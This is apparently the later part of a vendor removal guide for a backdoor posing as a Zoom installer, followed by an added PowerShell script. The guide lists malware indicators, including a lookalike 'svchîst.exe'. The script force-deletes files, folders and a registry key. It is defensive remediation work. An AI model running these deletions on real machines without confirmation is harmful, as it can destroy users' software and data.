  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • NoRepair = "1"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayIcon = "%Application Data%\Zoom\bin\Zoom.exe"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayName = "Zoom"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayVersion = "5.0"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • EstimatedSize = "10000"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • HelpLink = "https://support.{BLOCKED}m.us/home"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • URLInfoAbout = "https://{BLOCKED}m.us"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • URLUpdateInfo = "https://{BLOCKED}m.us"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • Publisher = "Zoom Video Communications, Inc."
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • UninstallString = "%Application Data%\Zoom\uninstall\Installer.exe /uninstall"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • InstallLocation = "%Application Data%\Zoom\bin"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • NoModify = "1"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • NoRepair = "1"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Version = "1"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Path = "%Application Data%\Zoom\bin\npzoomplugin.dll"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • ProductName = "Zoom Video Plugin"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Description = "Zoom Video Plugin"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Vendor = "Zoom Video Communications, Inc."
  • In HKEY_CURRENT_USER\Software\Classes\.zoommtg
    • (Default) = "ZoomLauncher"
  • In HKEY_CURRENT_USER\Software\Classes\.zoommtg
    • Content Type = "application/x-zoommtg-launcher"
  • In HKEY_CURRENT_USER\Software\Classes\ZoomLauncher
    • (Default) = "Zoom Launcher - 3.0.1"
  • In HKEY_CURRENT_USER\Software\Classes\ZoomLauncher\shell\open\command
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"
  • In HKEY_CURRENT_USER\Software\Classes\MIME\Database\Content Type\application/x-zoommtg-launcher
    • Extension = ".zoommtg"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • (Default) = "URL:Zoom Launcher"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • URL Protocol = ""
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • UseOriginalUrlEncoding = "1"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg\DefaultIcon
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe,1"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg\shell\open\command
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer
    • GlobalAssocChangedCounter = "12"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • notification = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • Security = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • General = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • Certificates = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • DisplayName = "installer 20.0.9800.1720"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • DisplayVersion = "20.0.9800.1720"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • VersionMajor = "20"
    • VersionMinor = "0"
    • Publisher = "Company Inc."
    • DisplayIcon = "%User Temp%\Company Inc.\installer\Uninstall.exe"
    • UninstallString = "%User Temp%\Company Inc.\installer\Uninstall.exe"
    • InstallLocation = "%User Temp%\Company Inc.\installer"
    • InstallSource = "%Windows%\SysWOW64\drivers"
    • InstallDate = "20200109"
    • Language = "1049"
    • EstimatedSize = "1"
    • NoModify = "1"
    • NoRepair = "1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer
    • GlobalAssocChangedCounter = "13"
    • GlobalAssocChangedCounter = "14"

Step 4

Search for and delete the following files.

Component files may have the hidden attribute set. Click [More advanced options] and tick the [Search hidden files and folders] checkbox so that hidden files and folders are included in the search results.
  • %Application Data%\Zoom\bin\util.dll
  • %Application Data%\Zoom\zoom_install_src\mcm.dll
  • %Application Data%\Zoom\bin\record_stop.pcm
  • %Application Data%\Zoom\zoom_install_src\leave.pcm
  • %Application Data%\Zoom\bin\leave.pcm
  • %Application Data%\Zoom\uninstall\Installer.exe
  • %Application Data%\Zoom\bin\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\asproxy.dll
  • %Application Data%\Zoom\bin\zTscoder.exe
  • %User Temp%\7zS8C40EAE9\Zoom.msi
  • %System%\drivers\libeay32.dll
  • %Application Data%\Zoom\zoom_install_src\zcacert.pem
  • %Application Data%\Zoom\data\zoomus.tmp.db
  • %Application Data%\Zoom\zoom_install_src\npzoomplugin.dll
  • %Application Data%\Zoom\bin\Zoom.exe
  • %Application Data%\Zoom\zoom_install_src\ring.pcm
  • %Application Data%\Zoom\bin\asproxy.dll
  • %System%\drivers\install.exe
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\reslib.dll
  • %Application Data%\Zoom\bin\record_start.pcm
  • %Application Data%\Zoom\zoom_install_src\dingdong1.pcm
  • %Application Data%\Zoom\bin\msaalib.dll
  • %Application Data%\Zoom\bin\zWebService.dll
  • %Application Data%\Zoom\bin\zcacert.pem
  • %Application Data%\Zoom\zoom_install_src\zChatUI.dll
  • %Application Data%\Zoom\bin\dingdong1.pcm
  • %Application Data%\Zoom\bin\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\zVideoUI.dll
  • %Application Data%\Zoom\zoom_install_src\zzhost.dll
  • %Application Data%\Zoom\bin\aomagent.dll
  • %Application Data%\Zoom\bin\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\CptInstall.exe
  • %Application Data%\Zoom\zoom_install_src\zChatApp.dll
  • %Application Data%\Zoom\bin\Droplet.pcm
  • %Application Data%\Zoom\zoom_install_src\XmppDll.dll
  • %Application Data%\Zoom\bin\reslib.dll
  • %Application Data%\Zoom\bin\dingdong.pcm
  • %Start Menu%\Programs\Zoom\Start Zoom.lnk
  • %Application Data%\Zoom\installer.txt
  • %Application Data%\Zoom\zoom_install_src\tp.dll
  • %Start Menu%\Programs\Zoom\Uninstall Zoom.lnk
  • %Application Data%\Zoom\zoom_install_src\record_start.pcm
  • %Application Data%\Zoom\bin\CptService.exe
  • %Application Data%\Zoom\bin\zzhost.dll
  • %Application Data%\Zoom\bin\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\XmppDll.dll
  • %Application Data%\Zoom\zoom_install_src\msaalib.dll
  • %Application Data%\Zoom\zoom_install_src\DuiLib.dll
  • %Application Data%\Zoom\zoom_install_src\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zCrashReport.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_chat_chime.pcm
  • %Application Data%\Zoom\zoom_install_src\CptControl.exe
  • %Application Data%\Zoom\bin\zChatApp.dll
  • %Application Data%\Zoom\zoom_install_src\libcrypto-1_1.dll
  • %Application Data%\Zoom\bin\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.dll
  • %Application Data%\Zoom\bin\DuiLib.dll
  • %Application Data%\Zoom\data\Zoom.us.ini
  • %Application Data%\Zoom\zoom_install_src\ZoomInstall.xml
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\101.ico
  • %Application Data%\Zoom\zoom_install_src\zVideoApp.dll
  • %Application Data%\Zoom\bin\CptShare.dll
  • %Application Data%\Zoom\data\client.config
  • %Application Data%\Zoom\zoom_install_src\zWebService.dll
  • %Application Data%\Zoom\zoom_install_src\CptService.exe
  • %Application Data%\Zoom\data\zoomus.db
  • %Application Data%\Zoom\bin\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\libcrypto-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\ssb_sdk.dll
  • %Application Data%\Zoom\zoom_install_src\libfaac.dll
  • %System%\drivers\ssleay32.dll
  • %Application Data%\Zoom\bin\viper.dll
  • %Application Data%\Zoom\bin\Cmmlib.dll
  • %Application Data%\Zoom\zoom_install_src\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\npzoomplugin.dll
  • %Application Data%\Zoom\zoom_install_src\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\CptHost.exe
  • %Application Data%\Zoom\bin\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\duilib_license.txt
  • %User Temp%\CptShare.dll
  • %Application Data%\Zoom\bin\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Installer.exe
  • %Application Data%\Zoom\bin\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\zmb.dll
  • %Application Data%\Zoom\bin\zlt.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\zChatUI.dll
  • %Application Data%\Zoom\zoom_install_src\zlt.dll
  • %Application Data%\Zoom\bin\zWinRes.dll
  • %Application Data%\Zoom\zoom_install_src\CptShare.dll
  • %AppDataLocal%\GDIPFONTCACHEV1.DAT
  • %Application Data%\Zoom\zoom_install_src\duilib_license.txt
  • %Application Data%\Zoom\zoom_install_src\aomagent.dll
  • %Application Data%\Zoom\zoom_install_src\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\Droplet.pcm
  • %Application Data%\Zoom\bin\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\ring.pcm
  • %Application Data%\Zoom\zoom_install_src\nydus.dll
  • %Application Data%\Zoom\bin\zVideoUI.dll
  • %Application Data%\Zoom\bin\nydus.dll
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe
  • %Application Data%\Zoom\bin\zmb.dll
  • %Application Data%\Zoom\zoom_install_src\zWinRes.dll
  • %System%\drivers\svchîst.exe
  • %Application Data%\Zoom\zoom_install_src\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\Installer.exe
  • %Application Data%\Zoom\zoom_install_src\record_stop.pcm
  • %Application Data%\Zoom\bin\ssb_sdk.dll
  • %Application Data%\Zoom\bin\libfaac.dll
  • %Application Data%\Zoom\bin\zVideoApp.dll
  • %Application Data%\Zoom\zoom_install_src\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\dingdong.pcm
  • %Application Data%\Zoom\zoom_install_src\zTscoder.exe
  • %Application Data%\Zoom\bin\mcm.dll
  • %Application Data%\Zoom\bin\CptHost.exe
  • %Application Data%\Zoom\appsafecheck.txt
  • %Application Data%\Zoom\zoom_install_src\util.dll
  • %Application Data%\Zoom\zoom_install_src\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Cmmlib.dll
  • %User Temp%\7zS8C40EAE9\Installer.exe
  • %Desktop%\Start Zoom.lnk
  • %Application Data%\Zoom\bin\directui_license.txt
  • %Application Data%\Zoom\zoom_install_src\directui_license.txt
  • %Application Data%\Zoom\bin\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\viper.dll
  • %Application Data%\Zoom\zoom_install_src\CptInstall.exe
  • %Application Data%\Zoom\bin\meeting_chat_chime.pcm
  • %Application Data%\Zoom\bin\ZoomInstall.xml
  • %Application Data%\Zoom\zoom_install_src\Zoom.exe
  • %Application Data%\Zoom\bin\CptControl.exe
  • %Application Data%\Zoom\bin\tp.dll

Step 5

Search for and delete the following folders.

The folders may have the hidden attribute set. Click [More advanced options] and tick the [Search hidden files and folders] checkbox so that hidden files and folders are included in the search results.
  • %Application Data%\Zoom\zoom_install_src
  • %Application Data%\Zoom\bin
  • %User Temp%\Zoom Meetings\5.0.1
  • %User Temp%\7zS8C40EAE9
  • %Application Data%\Zoom
  • %User Temp%\$inst
  • %Start Menu%\Programs\Zoom
  • %User Temp%\Zoom Meetings
  • %Application Data%\Zoom\uninstall
  • %Application Data%\Zoom\logs
  • %Application Data%\Zoom\data
  • %Application Data%\Zoom\reports

Step 6

Scan your computer with an antivirus product running the latest engine and pattern files, and delete every file detected as "Backdoor.Win32.ZAPIZ.THDBABO". If the detected files have already been cleaned, quarantined, or deleted by the Trend Micro product, handling of the malware is complete and no further removal steps are required.

Step 7

Restore the following files from a backup. Note that only files related to Microsoft products are restored; if this malware/grayware/spyware also deleted programs that are not Microsoft products, those programs must be reinstalled.

  • %Application Data%\Zoom\logs\zoo1A53.tmp
  • %Application Data%\Zoom\data\zoomus.db-journal
  • %Application Data%\Zoom\logs\zooDFC3.tmp
  • %Application Data%\Zoom\logs\zoo1F90.tmp
  • %Application Data%\Zoom\data\zoomus.tmp.db-journal
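The removal steps above (the Uninstall registry key, the files of step 4 and the folders of step 5) can be checked and applied with the PowerShell script below. It is an added example, not Trend Micro tooling and not part of the original page. The mapping of the page's placeholders (%System%, %Application Data%, %AppDataLocal%, %User Temp%, %Start Menu%, %Desktop%) to real directories is an assumption about a user-level infection and must be adjusted for the affected profile; the script name used in the usage note is likewise hypothetical. Two points a practitioner should not miss are encoded in it: the file dropped into %System%\drivers is svchîst.exe, spelled with U+00EE, so a search for svchost.exe will not find it, and most of the listed paths are a Zoom 5.0.1 client installed as a decoy, so removing them uninstalls Zoom for that user. The GlobalAssocChangedCounter values under the explorer key are ordinary values that Explorer maintains itself, and the script leaves them alone; the step 7 files are Zoom's own log temp files and SQLite journal files, which a Zoom reinstall recreates.

```powershell
#Requires -RunAsAdministrator
<#
  Added triage/cleanup helper for the Backdoor.Win32.ZAPIZ.THDBABO indicators above.
  Not Trend Micro tooling. Default mode only reports; -Remove deletes, and
  -Remove -WhatIf previews the deletions without touching anything.
  Run it in the session of the affected user so profile-based paths resolve correctly.
#>
[CmdletBinding(SupportsShouldProcess = $true)]
param([switch]$Remove)

# Trend Micro placeholder -> real path. These mappings are the usual ones for a
# user-level infection and are an assumption; adjust for the affected profile.
$Map = [ordered]@{
    '%System%'           = Join-Path $env:SystemRoot 'System32'
    '%Application Data%' = $env:APPDATA
    '%AppDataLocal%'     = $env:LOCALAPPDATA
    '%User Temp%'        = Join-Path $env:LOCALAPPDATA 'Temp'
    '%Start Menu%'       = [Environment]::GetFolderPath('StartMenu')
    '%Desktop%'          = [Environment]::GetFolderPath('Desktop')
}
function Expand-TmPath([string]$Path) {
    foreach ($k in $Map.Keys) { $Path = $Path.Replace($k, $Map[$k]) }
    return $Path
}

# Backdoor components outside the Zoom decoy. "svchîst.exe" is spelled with
# U+00EE (i-circumflex), a lookalike of svchost.exe; it must be matched exactly.
$BackdoorFiles = @(
    '%System%\drivers\svchîst.exe'
    '%System%\drivers\install.exe'
    '%System%\drivers\libeay32.dll'
    '%System%\drivers\ssleay32.dll'
    '%User Temp%\CptShare.dll'
    '%User Temp%\101.ico'
    '%Desktop%\Start Zoom.lnk'       # shortcut created by the decoy installer
)
# Zoom 5.0.1 client dropped as cover. Removing these folders uninstalls Zoom for
# this user; reinstall from the vendor afterwards if Zoom is actually needed.
$DecoyFolders = @(
    '%Application Data%\Zoom'
    '%User Temp%\Zoom Meetings'
    '%User Temp%\7zS8C40EAE9'        # 7-Zip SFX scratch dir; suffix may differ per run (assumption)
    '%User Temp%\$inst'
    '%Start Menu%\Programs\Zoom'
)
$UninstallKey = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720'

function Get-Findings {
    $found = New-Object System.Collections.Generic.List[object]
    foreach ($p in $BackdoorFiles) {
        $real = Expand-TmPath $p
        # Test-Path sees hidden/system files, so the attrib +h +s trick does not hide them here
        if (Test-Path -LiteralPath $real -PathType Leaf) {
            $item = Get-Item -LiteralPath $real -Force
            $found.Add([pscustomobject]@{
                Type = 'File'; Path = $real
                Attributes = [string]$item.Attributes
                Sha256 = (Get-FileHash -LiteralPath $real -Algorithm SHA256).Hash
            })
        }
    }
    foreach ($p in $DecoyFolders) {
        $real = Expand-TmPath $p
        if (Test-Path -LiteralPath $real -PathType Container) {
            $found.Add([pscustomobject]@{ Type = 'Folder'; Path = $real; Attributes = ''; Sha256 = '' })
        }
    }
    if (Test-Path -LiteralPath $UninstallKey) {
        $found.Add([pscustomobject]@{ Type = 'RegKey'; Path = $UninstallKey; Attributes = ''; Sha256 = '' })
    }
    return $found
}

function Remove-Findings($Findings) {
    # Stop anything still executing from a listed image first, or the delete fails with "in use"
    $images = $Findings | Where-Object Type -eq 'File' | ForEach-Object { $_.Path.ToLowerInvariant() }
    Get-Process | Where-Object { $_.Path -and ($images -contains $_.Path.ToLowerInvariant()) } |
        Stop-Process -Force
    foreach ($f in $Findings) {
        switch ($f.Type) {
            'File'   { Remove-Item -LiteralPath $f.Path -Force }            # -Force overrides hidden/system
            'Folder' { Remove-Item -LiteralPath $f.Path -Recurse -Force }
            'RegKey' { Remove-Item -LiteralPath $f.Path -Recurse -Force }
        }
    }
}

$findings = Get-Findings
$findings | Format-Table Type, Path, Attributes, Sha256 -AutoSize
if ($Remove) { Remove-Findings $findings } else { Write-Host 'Report only. Re-run with -Remove (add -WhatIf to preview).' }
```

Saved as, say, Clean-Zapiz.ps1 (a hypothetical name), run it from an elevated prompt in the affected user's session: first without arguments to get the report with SHA-256 hashes for your incident record, then with -Remove -WhatIf to preview, then with -Remove. The SHA-256 hashes are worth keeping before deletion because the page gives no hashes and the dropped names are generic. Finish with the full scan of step 6, which catches anything the literal path list misses.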

